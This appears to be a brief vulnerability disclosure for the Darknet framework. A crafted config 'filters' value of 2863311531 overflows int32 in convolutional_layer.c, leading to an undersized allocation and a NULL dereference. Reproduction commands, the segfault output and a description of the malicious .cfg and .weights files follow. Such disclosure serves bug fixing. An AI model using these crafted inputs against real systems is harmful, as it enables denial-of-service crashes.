src/convolutional_layer.c:195. A filters value in .cfg that
overflows int32 causes undersized buffer allocation, NULL pointer dereference, crash.1git clone https://github.com/pjreddie/darknet
2cd darknet && make
3./darknet partial malicious.cfg malicious.weights output 1conv -1431655765 1 x 1 / 1 32 x 32 x 3 -> 32 x 32 x-1431655765
Loading weights from malicious.weights...Done!
Saving weights to output
Segmentation fault (core dumped)malicious.cfg -- filters=2863311531, overflows int32malicious.weights -- 16-byte header, enough to reach the crash